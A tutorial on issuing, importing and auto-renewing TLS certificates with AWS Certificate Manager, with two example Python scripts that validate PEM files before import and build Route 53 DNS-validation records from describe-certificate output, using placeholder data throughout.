If you host services on Amazon Web Services (AWS), you should be using AWS Certificate Manager (ACM) to issue and renew your TLS (SSL) certificates for every AWS resource that can consume one.
| Note: This post assumes you own the domain and can add DNS records for it (ideally its zone is hosted in Route 53). |
Request a Certificate

Choose: "Request a public certificate"
Then enter the following information:
Fully qualified domain name (FQDN)
- The domain name the certificate is issued for (sub.domain.com). Add further names if one certificate must cover several hosts; each name is validated separately.
- Use a wildcard for wildcard certificates (*.domain.com). A wildcard covers exactly one label: *.domain.com matches www.domain.com, but not domain.com itself and not a.b.domain.com, so add the apex as its own name if you need it.
| Note: double wildcard certificates (*.*.domain.com) don't exist. |
Validation method
- DNS: ACM gives you a CNAME record (a name and a value) to create in the domain's DNS. Being able to publish that record proves control of the domain. Prefer this method: as long as the record stays in DNS, ACM can renew the certificate without anyone's involvement.
- Email: ACM emails the domain's registrant, administrative and technical contacts from WHOIS, plus admin@, administrator@, hostmaster@, postmaster@ and webmaster@ at the domain, and someone has to click the approval link. The same is required at every renewal.
Key algorithm
- The public-key algorithm and size of the certificate's key pair (RSA 2048, or ECDSA P-256 / P-384). This is the key that signs the TLS handshake, not an "encryption scheme" for the traffic: ECDSA P-256 gives a smaller certificate and a faster handshake, RSA 2048 the widest client compatibility.
Import Existing Certificates
If you already have a certificate from another CA, you can import it, as long as you have the certificate itself, its private key (unencrypted, RSA or EC) and the certificate chain (the intermediate certificates that link it to a trusted root), all PEM-encoded.
Note: Imported certificates are not renewed automatically. You must import a fresh certificate before the old one expires, ideally over the same ARN so that attached resources keep working without reconfiguration.
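Before calling `aws acm import-certificate`, it is worth checking the three PEM files for the mistakes ACM rejects (an encrypted private key, a chain that starts with the leaf instead of the intermediate). The script below is an added example and not code from the original post or from AWS; it inspects PEM structure with the standard library only, and the PEM bodies it contains are constructed placeholders rather than real certificates or keys. The optional `key_matches_certificate` check, which needs the third-party `cryptography` package, is the only part that proves the key actually belongs to the certificate.

```python
"""Added example (not from the original post): pre-flight check for the PEM
files that `aws acm import-certificate --certificate ... --private-key ...
--certificate-chain ...` expects. Structural checks only, except for the
optional key/certificate match at the end. The PEM bodies below are
constructed placeholders, not real DER data."""
import re
from typing import List, Optional, Tuple

# One PEM block: BEGIN/END labels must match; body is whatever lies between.
PEM_BLOCK = re.compile(
    r"-----BEGIN (?P<label>[A-Z0-9 ]+)-----\s*(?P<body>.*?)\s*-----END (?P=label)-----",
    re.S,
)
# Unencrypted key encodings ACM accepts (PKCS#8, PKCS#1 RSA, SEC1 EC).
ACCEPTED_KEY_LABELS = {"PRIVATE KEY", "RSA PRIVATE KEY", "EC PRIVATE KEY"}

# Constructed sample inputs shaped like PEM; bodies are arbitrary base64.
LEAF = "-----BEGIN CERTIFICATE-----\nTEFFRkVYQU1QTEU=\n-----END CERTIFICATE-----\n"
INTERMEDIATE = "-----BEGIN CERTIFICATE-----\nSU5URVJNRVhBTVBMRQ==\n-----END CERTIFICATE-----\n"
KEY_OK = "-----BEGIN EC PRIVATE KEY-----\nS0VZRVhBTVBMRQ==\n-----END EC PRIVATE KEY-----\n"
KEY_ENCRYPTED = ("-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
                 "DEK-Info: AES-256-CBC,0123456789ABCDEF\n\nS0VZRVhBTVBMRQ==\n"
                 "-----END RSA PRIVATE KEY-----\n")


def pem_blocks(text: str) -> List[Tuple[str, str]]:
    """Return (label, body-without-whitespace) for every PEM block in `text`."""
    return [(m.group("label"), re.sub(r"\s+", "", m.group("body")))
            for m in PEM_BLOCK.finditer(text)]


def preflight_import(cert_pem: str, key_pem: str, chain_pem: str) -> List[str]:
    """Return the problems found; an empty list means the bundle looks importable."""
    problems = []

    certs = pem_blocks(cert_pem)
    if len(certs) != 1 or certs[0][0] != "CERTIFICATE":
        problems.append("--certificate must contain exactly one CERTIFICATE block")

    keys = pem_blocks(key_pem)
    # Legacy (Proc-Type) and PKCS#8 encrypted keys are both refused by ACM.
    if "Proc-Type: 4,ENCRYPTED" in key_pem or any(l == "ENCRYPTED PRIVATE KEY" for l, _ in keys):
        problems.append("private key is encrypted; ACM needs it unencrypted (strip the passphrase with openssl first)")
    elif len(keys) != 1 or keys[0][0] not in ACCEPTED_KEY_LABELS:
        problems.append("--private-key must contain exactly one unencrypted RSA or EC private key block")

    chain = pem_blocks(chain_pem)
    if not chain:
        problems.append("--certificate-chain is empty; include the issuing intermediate(s)")
    elif any(label != "CERTIFICATE" for label, _ in chain):
        problems.append("--certificate-chain may contain only CERTIFICATE blocks")
    elif certs and chain[0][1] == certs[0][1]:
        problems.append("chain starts with the leaf certificate; it should start with the issuing intermediate")
    return problems


def key_matches_certificate(cert_pem: str, key_pem: str) -> Optional[bool]:
    """True if the key's public half equals the certificate's SubjectPublicKeyInfo.
    Needs the `cryptography` package; returns None when it is not installed."""
    try:
        from cryptography import x509
        from cryptography.hazmat.primitives import serialization
    except ImportError:
        return None
    cert = x509.load_pem_x509_certificate(cert_pem.encode())
    key = serialization.load_pem_private_key(key_pem.encode(), password=None)
    fmt = (serialization.Encoding.DER, serialization.PublicFormat.SubjectPublicKeyInfo)
    return cert.public_key().public_bytes(*fmt) == key.public_key().public_bytes(*fmt)


if __name__ == "__main__":
    for name, key in (("plain key", KEY_OK), ("encrypted key", KEY_ENCRYPTED)):
        print(name, preflight_import(LEAF, key, INTERMEDIATE) or "looks importable")
```

With real files the call would be `preflight_import(open("cert.pem").read(), open("key.pem").read(), open("chain.pem").read())`, followed by `key_matches_certificate` on the first two, and only then `aws acm import-certificate --certificate fileb://cert.pem --private-key fileb://key.pem --certificate-chain fileb://chain.pem` (add `--certificate-arn` to replace an expiring import in place).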
The Joy of AutoRenewal
An expired certificate is one of the most common causes of an avoidable outage. Certificates issued by ACM can be renewed automatically: ACM starts the renewal about 60 days before expiry, and the renewed certificate keeps the same ARN, so the load balancers and distributions using it pick it up without any change on your side. Two conditions apply: the certificate must be ACM-issued, not imported, and its domain validation must still succeed. For a DNS-validated certificate that means the validation CNAME is still in DNS (a record deleted during a DNS migration is the usual reason renewal fails); for an email-validated certificate someone has to answer the renewal email each time. Check the renewal status in the console or with describe-certificate rather than assuming it happened.
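The DNS validation records from the "Validation method" section and the renewal conditions above both show up in the JSON that `aws acm describe-certificate` returns. The script below is an added example, not code from the original post or from AWS: it builds the Route 53 change batch that publishes the validation CNAMEs (dropping the duplicate that the apex name and the wildcard share, since Route 53 rejects a batch that upserts one record set twice) and lists the reasons a certificate will not renew by itself. The two sample documents are constructed for the example; their field names follow the real API response, but every ARN, record name and value is a placeholder.

```python
"""Added example, not code from the original post: helpers around the JSON
that `aws acm describe-certificate --certificate-arn <arn> --output json`
returns. Sample documents are constructed; field names follow the real API,
values are placeholders."""
import json
from datetime import datetime, timezone

SAMPLE_DESCRIBE_OUTPUT = json.loads(r"""
{"Certificate": {
  "CertificateArn": "arn:aws:acm:us-east-1:111122223333:certificate/0000-EXAMPLE",
  "DomainName": "example.com",
  "SubjectAlternativeNames": ["example.com", "*.example.com", "api.example.com"],
  "Type": "AMAZON_ISSUED", "Status": "ISSUED", "KeyAlgorithm": "EC_prime256v1",
  "NotAfter": "2025-12-01T23:59:59+00:00",
  "InUseBy": ["arn:aws:elasticloadbalancing:us-east-1:111122223333:loadbalancer/app/web/EXAMPLE"],
  "RenewalEligibility": "ELIGIBLE",
  "RenewalSummary": {"RenewalStatus": "PENDING_AUTO_RENEWAL", "UpdatedAt": "2025-10-01T00:00:00+00:00"},
  "DomainValidationOptions": [
    {"DomainName": "example.com", "ValidationMethod": "DNS", "ValidationStatus": "SUCCESS",
     "ResourceRecord": {"Name": "_1a2b3c.example.com.", "Type": "CNAME", "Value": "_9z8y7x.acm-validations.aws."}},
    {"DomainName": "*.example.com", "ValidationMethod": "DNS", "ValidationStatus": "SUCCESS",
     "ResourceRecord": {"Name": "_1a2b3c.example.com.", "Type": "CNAME", "Value": "_9z8y7x.acm-validations.aws."}},
    {"DomainName": "api.example.com", "ValidationMethod": "DNS", "ValidationStatus": "SUCCESS",
     "ResourceRecord": {"Name": "_4d5e6f.api.example.com.", "Type": "CNAME", "Value": "_0w1v2u.acm-validations.aws."}}
  ]}}
""")

# A certificate imported from another CA: ACM reports it as ineligible for renewal.
SAMPLE_IMPORTED = {"Certificate": {
    "CertificateArn": "arn:aws:acm:us-east-1:111122223333:certificate/1111-EXAMPLE",
    "DomainName": "legacy.example.com", "Type": "IMPORTED", "Status": "ISSUED",
    "NotAfter": "2025-12-01T23:59:59+00:00", "RenewalEligibility": "INELIGIBLE",
    "InUseBy": [], "DomainValidationOptions": []}}


def route53_change_batch(describe_output, ttl=300):
    """Build the --change-batch document that publishes ACM's validation CNAMEs."""
    seen, changes = set(), []
    for opt in describe_output["Certificate"]["DomainValidationOptions"]:
        if opt.get("ValidationMethod") != "DNS":
            continue
        rr = opt["ResourceRecord"]
        key = (rr["Name"].lower(), rr["Type"], rr["Value"].lower())
        if key in seen:  # apex and wildcard share a record; Route 53 rejects the duplicate
            continue
        seen.add(key)
        changes.append({"Action": "UPSERT", "ResourceRecordSet": {
            "Name": rr["Name"], "Type": rr["Type"], "TTL": ttl,
            "ResourceRecords": [{"Value": rr["Value"]}]}})
    return {"Comment": "ACM DNS validation records", "Changes": changes}


def renewal_risks(describe_output, now, warn_days=30):
    """Return the reasons this certificate may not renew by itself (empty list = fine).
    `now` is an ISO-8601 string or a datetime, passed in so results are reproducible."""
    cert = describe_output["Certificate"]
    if isinstance(now, str):
        now = datetime.fromisoformat(now)
    if now.tzinfo is None:
        now = now.replace(tzinfo=timezone.utc)
    risks = []
    if cert.get("Type") == "IMPORTED":
        risks.append("imported certificate: ACM never renews it, import a new one before expiry")
    if cert.get("RenewalEligibility") == "INELIGIBLE":
        risks.append("ACM reports RenewalEligibility=INELIGIBLE")
    for opt in cert.get("DomainValidationOptions", []):
        if opt.get("ValidationMethod") == "EMAIL":
            risks.append(f"{opt['DomainName']}: email-validated, renewal needs someone to answer the approval mail")
    status = cert.get("RenewalSummary", {}).get("RenewalStatus")
    if status in ("PENDING_VALIDATION", "FAILED"):
        risks.append(f"renewal status {status}: domain validation is not completing (validation CNAME removed?)")
    days_left = (datetime.fromisoformat(cert["NotAfter"]) - now).days
    if days_left < warn_days:
        risks.append(f"expires in {days_left} days")
    if not cert.get("InUseBy"):
        risks.append("not attached to any AWS resource: confirm it is still needed")
    return risks


if __name__ == "__main__":
    print(json.dumps(route53_change_batch(SAMPLE_DESCRIBE_OUTPUT), indent=2))
    for doc in (SAMPLE_DESCRIBE_OUTPUT, SAMPLE_IMPORTED):
        print(doc["Certificate"]["DomainName"], renewal_risks(doc, datetime.now(timezone.utc)) or "ok")
```

In practice the change batch is written to a file and applied with `aws route53 change-resource-record-sets --hosted-zone-id <zone id> --change-batch file://batch.json`; ACM then moves the certificate to ISSUED once it sees the records. Running `renewal_risks` over every certificate in an account on a schedule catches the "CNAME deleted during a DNS migration" case well before the certificate expires.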
Random ACM Notes
| Public certificates issued by ACM are not exportable by default: the private key is generated and kept inside ACM, you can never view or download it, and the certificate can only be attached to AWS services that integrate with ACM (load balancers, CloudFront, API Gateway and the like), not copied to an EC2 instance or to anything outside AWS. That is the more secure arrangement, since a key that cannot leave the service cannot leak from a laptop or a repository. Newer ACM releases let you opt in to an exportable public certificate at request time; the default remains non-exportable and is the one to keep unless you have a concrete need. |